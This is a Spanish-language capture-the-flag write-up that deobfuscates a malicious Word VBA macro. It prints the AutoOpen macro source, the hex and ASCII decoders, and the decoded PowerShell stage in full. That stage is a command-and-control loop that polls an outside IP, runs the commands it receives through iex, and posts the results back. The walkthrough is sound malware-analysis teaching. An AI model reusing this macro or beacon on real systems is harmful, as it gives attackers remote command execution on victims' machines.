|Hex String|89 119 65 103 65 67 |383920313139203635203130332036352036372034382|
| |48 65 84 81 66 108 |036352038342038312036362031303820363520373220|
| |65 72 81 65 97 65 66|383120363520393720363520363620313138203635203|
| |118 65 71 |73120 |
|Hex String|81 65 73 65 |3831203635203733203635 |
|Hex String|66 81 |363620383120 |
|Hex String|65 69 56 65 85 119 |363520363920353620363520383520313139203636203|
| |66 85 65 67 65 65 76|835203635203637203635203635203736203831203636|
| |81 66 73 65 71 85 65|203733203635203731203835203635203839203831203|
| |89 81 66 107 65 |63620313037203635 |
|Hex String|71 85 65 99 103 66 |373120383520363520393920313033203636203132322|
| |122 65 67 65 65 81 |036352036372036352036352038312036352036362035|
| |65 66 55 |35 |
|Hex String| 65 67 73 65 81 81 |203635203637203733203635203831203831203636203|
| |66 49 65 72 81 65 |439203635203732203831203635 |
|Hex String|97 65 66 118 65 72 |393720363520363620313138203635203732203733203|
| |73 65 97 81 66 54 65|635203937203831203636203534203635203731203639|
| |71 69 65 100 65 66 |203635203130302036352036362031313220363520373|
| |112 65 71 56 65 98 |1203536203635203938 |
|Hex String| 103 |20313033 |
|Hex String|65 105 65 68 48 65 |363520313035203635203638203438203635203734203|
| |74 65 66 112 65 72 |635203636203131322036352037322034382036352037|
| |48 65 73 65 65 |3320363520363520 |
|Hex String|116 65 69 73 65 98 |313136203635203639203733203635203938203131392|
| |119 66 107 |0363620313037 |
|Hex String|65 72 |363520373220 |
|Hex String|107 65 73 65 65 111 |313037203635203733203635203635203131312036352|
| |65 70 115 65 85 119 |037302031313520363520383520313139203636203533|
| |66 53 65 72 77 65 |203635203732203737203635203130302036352036362|
| |100 65 66 108 65 71 |0313038203635203731 |
|Hex String|48 65 |3438203635 |
|Hex String| 76 103 66 85 65 71 |203736203130332036362038352036352037312038352|
| |85 65 101 65 66 48 |036352031303120363520363620343820363520363720|
| |65 67 52 65 82 81 66|353220363520383220383120363620313137203635203|
| |117 65 71 77 65 98 |731203737203635203938 |
|Hex String|119 66 107 65 71 107|313139203636203130372036352037312031303720363|
| |65 98 103 66 110 65 |520393820313033203636203131302036352037302034|
| |70 48 65 79 103 65 |382036352037392031303320363520353420363520373|
| |54 65 70 85 65 |0203835203635 |
|Hex String| 86 65 66 |203836203635203636 |
|Hex String|71 65 68 103 65 76 |373120363520363820313033203635203736203130332|
| |103 66 72 65 71 |03636203732203635203731 |
|Hex String| 85 65 100 65 66 67 |203835203635203130302036352036362036372036352|
| |65 72 107 65 100 65 |037322031303720363520313030203635203636203130|
| |66 108 65 |38203635 |
|Hex String|72 77 65 75 65 65 |373220373720363520373520363520363520313037203|
| |107 65 71 85 65 75 |635203731203835203635203735203131392036352031|
| |119 65 107 65 72 73 |303720363520373220373320363520373520383120363|
| |65 75 81 65 |5 |
|Hex String| 103 65 67 48 |20313033203635203637203438 |
|Hex String|65 97 103 66 |36352039372031303320363620 |
|Hex String|118 65 71 107 65 98 |313138203635203731203130372036352039382031303|
| |103 65 103 65 67 99 |320363520313033203635203637203939203635203733|
| |65 73 65 65 110 65 |203635203635203131302036352036372031303720363|
| |67 107 65 |5 |
|Hex String| 81 65 103 65 72 77 |203831203635203130332036352037322037372036352|
| |65 98 65 66 108 65 |039382036352036362031303820363520373120383520|
| |71 85 65 99 65 65 |363520393920363520363520313033203635203638203|
| |103 65 68 65 65 76 |63520363520373620313033 |
| |103 | |
|Hex String|65 52 65 72 48 65 83|363520353220363520373220343820363520383320363|
| |65 66 |520363620 |
|Hex String|85 65 69 73 65 101 |383520363520363920373320363520313031203131392|
| |119 65 49 65 72 85 |036352034392036352037322038352036352039392036|
| |65 99 65 65 122 65 |3520363520313232203635 |
|Hex String|72 73 65 88 119 65 |373220373320363520383820313139203635203132322|
| |122 65 68 81 65 78 8|036352036382038312036352037382038 |
|Hex String|1 66 53 65 70 56 65 |312036362035332036352037302035362036352039382|
| |98 81 65 48 65 71 77|03831203635203438203635203731203737203635 |
| |65 | |
|Hex String|99 103 65 119 65 68 |393920313033203635203131392036352036382038352|
| |85 65 102 81 |036352031303220383120 |
|Hex String|65 61 |3635203631 |
|Hex String|Scripting.FileSyst |536372697074696e672e46696c6553797374 |
|Hex String|emObject |656d4f626a656374 |
|Hex String|istory.bak |6973746f72792e62616b |
+----------+--------------------+---------------------------------------------+
Desofuscación de código VBA
Estamos interesados en los scripts de VBA anteriores. Vamos a comenzar por el más corto:
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
Parece que está realizando algún tipo de transformación a la variable tiyrahvbz pasada como argumento.
Luego, tenemos un script de VBA muy grande. Lo dividiré en trozos más pequeños. Estas son las primeras funciones:
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
La función llamada AutoOpen se ejecuta primero, y llama a odhsjwpphlxnb y lmavedb. La primera llama a sryivxjsdncj:
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
Y aquí hay otra llamada a okbzichkqtto, que es una función enorme:
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Reconociendo patrones
En verdad no necesitamos saber Visual Basic for Applications (VBA), solamente tenemos que reconocer patrones sospechosos. Por ejemplo, la función okbzichkqtto contiene un montón de strings que están codificadas en hexadecimal. Podemos coger la primera y decodificarla:
$ echo 3734203635203636203132322036352036382034382036352037342031 | xxd -r -p
74 65 66 122 65 68 48 65 74 1
Ahora tenemos números. A lo mejor son dígitos ASCII, vamos a ver:
$ python3 -q
>>> ''.join(map(lambda n: chr(int(n)), '74 65 66 122 65 68 48 65 74'.split()))
'JABzAD0AJ'
No parece nada prometedor…
Hallando el resultado
Nótese que el ejemplo anterior era para solo una string. En la función enorme teníamos un montón de strings que se concatenan usando los operadores + y & (que son equivalentes en cuanto a concatenación de strings en VBA).
De hecho, si leemos de nuevo la función uxdufnkjlialsyp, parece claro que está decodificando la string en formato hexadecimal. Luego, wdysllqkgsbzs realiza la transformación de dígitos ASCII a caracteres:
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
Ahora, podemos adaptar el código anterior en Python fácilmente y encontrar el resultado de la función enorme:
$ python3 solve.py
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=
El script se puede encontrar aquí: solve.py.
Flag
Ahora sí que reconocemos la salida como datos codificados en Base64, por lo que vamos a decodificarlo para encontrar la flag:
$ python3 solve.py | base64 -d
$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}
$ python3 solve.py | base64 -d | tr -d \\0 | grep -oE 'HTB{.*?}'
HTB{5up3r_345y_m4cr05}